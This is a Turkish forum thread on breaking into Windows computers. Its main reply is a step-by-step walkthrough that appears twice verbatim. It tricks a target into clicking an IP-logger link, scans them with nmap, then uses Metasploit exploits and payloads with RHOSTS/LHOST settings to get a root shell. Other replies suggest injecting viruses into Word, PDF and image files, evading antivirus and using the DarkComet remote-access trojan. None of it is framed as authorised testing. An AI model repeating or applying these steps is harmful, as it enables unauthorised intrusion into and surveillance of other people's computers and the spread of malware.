Windows'a Sızma
- Konuyu başlatan HACKER 33
- Başlangıç tarihi
Merhaba HACKER33
Eğer aynı ay üzerindeyse karşı tarafta MITM yapabilirsin.
Ama farklı ağdaysa illaki bi zehirleme yapman lazım diye biliyorum.
MITM saldırısı nasıl yapılır MitM (Ortadaki Adam) Saldırısı konusuna göz atarsan MITM hakkında bilgi alırsın.
İyi Forumlar.
uygulama değilde word resim dosyası gibi dosyalara enjekte edip, pazarlayabilirsin. Uygulamada olur. Ama karşındaki kişi konuya tedbirli davranıyorsa, (uygulama konusunda) word pdf resim gibi dosyalara virüs enjekte edebilirsin. Ayrıca kişi antivirüs kullanıyorsa bunların tanımlamaması için bir şey daha enjekte ediliyordu. Adını unuttum. Ama msfvenom da -h yada --help komutuyla öğrenebilirsin. iyi forumlar
MERHABA
MITM saldırısı sızmaktan ziyade izlemek olduğu için sizin işinize yaramaz.
Öncelikle hedef internete bir ev ağından bağlanıyorsa bu iyi.
İp logger sitesinden ip çekecek link hazırlayın, ve hedefe gönderin. (Ama İNSTAGRAM'dan değil.)
Hedef tıkladığı anda size ip adresi gelecek. (VPN veya TOR kullanmıyorsa doğru gelecektir.)
Bu ip adresini, Kali Linux'da NMAP tooluna gireceksiniz.
Sırasıyla >> nmap -sS -sV "İP ADRESİ" (Tırnaklar olmadan ip girin ve ENTER basın.)
Bu aşamada size karşı tarafın açık PORT'larını ve VERSİYON'larını verecektir.
Şimdi METASPLOİTİ çağıracaksınız.
msfconsole
Açıldıktan sonra NMAP'in verdiği açık portlardan biri (Örneğin 21 FTP VERSİYONXX) Buradaki versiyonxx'i kopyalayıp msfconsol'a geçeceksiniz.
ve yazacaksınız
search versiyonxx
Size bu versiyona özel exploitler verecektir. İçlerinde Great Excellent olan varsa onu seçin yoksa Normal'de olur.
Örneğin use 1 veya use (exploit'in tam adı) yazın ve ENTER basın.
Exploiti seçti ve komut satırı kırmızı bir renk aldı.
şimdi show options çekelim
RHOSTS:
RPORT:80
RHOSTS: Karşı tarafın ip adresini soruyor elle girelim.
set RHOSTS 192.168.192.168 (ÖRNEK)
Kendisi RPORT'u girmiş zaten 80 diye ellemeyelim.
Eğer burada LHOST varsa ve boş ise ona da kendi ip adresimizi girelim. set (LHOST KENDİ İP ADRESİN)
Herşey bittiyse bu sefer de
show PAYLOADS yazalım (hata alırsak.) ilk önce msfvenom yazalım, sonra show PAYLOADS yazalım.
Burada size 40 , 50 adet PAYLOAD sunacak hepsinin ayrı özellikleri vardır bunları önce araştırın sonra kullanın
Payload'ınıza karar verdiniz diyelim.
Yine use PAYLOAD NUMARASI veya use PAYLOAD İSMİ yazarak Payloadınızı seçebilirsiniz
Payloadınızı da seçtiyseniz.
EXPLOİT VEYA RUN DİYEREK SIZMAYA BAŞLIYORUZ. Hata verirse başarısız başka payload veya exploit deneyeceksiniz.
Vermediğini var sayıyorum( whoami ) diyerek sistemde ne olduğunuzu öğrenin.
root
evet sistemde root biziz.
şimdi diğer komutlar (CD,LS) vesaire burada hedefin dosyaları gözüküyorsa gerisi size kalmış.
SAYGILARIMI SUNARIM...
DarkComet ile kolayca pclere sizabilirsiniz
Allah Razı Olsun Kardeşimmm.Araştırıyordum Sonunda.Port olayısa sitelerde oluyormuş.Sağolll.Birde neden lhost yazıyoruz.Çünkü trojan atmıyoruz.Trojan yaparken biz kendi ip adresimizle server oluşturuyoruz.Ama buradaki mantık nasıl onu anlamadım.İyi forumlarMERHABA
MITM saldırısı sızmaktan ziyade izlemek olduğu için sizin işinize yaramaz.
Öncelikle hedef internete bir ev ağından bağlanıyorsa bu iyi.
İp logger sitesinden ip çekecek link hazırlayın, ve hedefe gönderin. (Ama İNSTAGRAM'dan değil.)
Hedef tıkladığı anda size ip adresi gelecek. (VPN veya TOR kullanmıyorsa doğru gelecektir.)
Bu ip adresini, Kali Linux'da NMAP tooluna gireceksiniz.
Sırasıyla >> nmap -sS -sV "İP ADRESİ" (Tırnaklar olmadan ip girin ve ENTER basın.)
Bu aşamada size karşı tarafın açık PORT'larını ve VERSİYON'larını verecektir.
Şimdi METASPLOİTİ çağıracaksınız.
msfconsole
Açıldıktan sonra NMAP'in verdiği açık portlardan biri (Örneğin 21 FTP VERSİYONXX) Buradaki versiyonxx'i kopyalayıp msfconsol'a geçeceksiniz.
ve yazacaksınız
search versiyonxx
Size bu versiyona özel exploitler verecektir. İçlerinde Great Excellent olan varsa onu seçin yoksa Normal'de olur.
Örneğin use 1 veya use (exploit'in tam adı) yazın ve ENTER basın.
Exploiti seçti ve komut satırı kırmızı bir renk aldı.
şimdi show options çekelim
RHOSTS:
RPORT:80
RHOSTS: Karşı tarafın ip adresini soruyor elle girelim.
set RHOSTS 192.168.192.168 (ÖRNEK)
Kendisi RPORT'u girmiş zaten 80 diye ellemeyelim.
Eğer burada LHOST varsa ve boş ise ona da kendi ip adresimizi girelim. set (LHOST KENDİ İP ADRESİN)
Herşey bittiyse bu sefer de
show PAYLOADS yazalım (hata alırsak.) ilk önce msfvenom yazalım, sonra show PAYLOADS yazalım.
Burada size 40 , 50 adet PAYLOAD sunacak hepsinin ayrı özellikleri vardır bunları önce araştırın sonra kullanın
Payload'ınıza karar verdiniz diyelim.
Yine use PAYLOAD NUMARASI veya use PAYLOAD İSMİ yazarak Payloadınızı seçebilirsiniz
Payloadınızı da seçtiyseniz.
EXPLOİT VEYA RUN DİYEREK SIZMAYA BAŞLIYORUZ. Hata verirse başarısız başka payload veya exploit deneyeceksiniz.
Vermediğini var sayıyorum( whoami ) diyerek sistemde ne olduğunuzu öğrenin.
root
evet sistemde root biziz.
şimdi diğer komutlar (CD,LS) vesaire burada hedefin dosyaları gözüküyorsa gerisi size kalmış.
SAYGILARIMI SUNARIM...
Son düzenleme:
Allah senden de razı olsun.
TROJAN atmıyoruz demişsin.
EXPLOİT bir nevi TROJANLA aynı mantıkta çalışır.
(EXPLOİT'İ sistemin içine yerleşip orada yuva kuran bir böcek olarak düşün.)
Neden LHOST yazıyoruz demişsin.
Çünkü PAYLOAD görevlendirdik.
PAYLOAD sisteme yerleşen Böceğin (EXPLOİT) bizimle iletişim kurduğu bir nevi telsizidir.
Bu telsize kendi Telefon Numaranı (İP ADRESİN-LHOST) girmezsen seni arayamaz / iletişim kuramaz / senden emir alamaz.
Sistemin içinde öylece bekleyen bir böceğe dönüşür..
İYİ FORUMLAR...
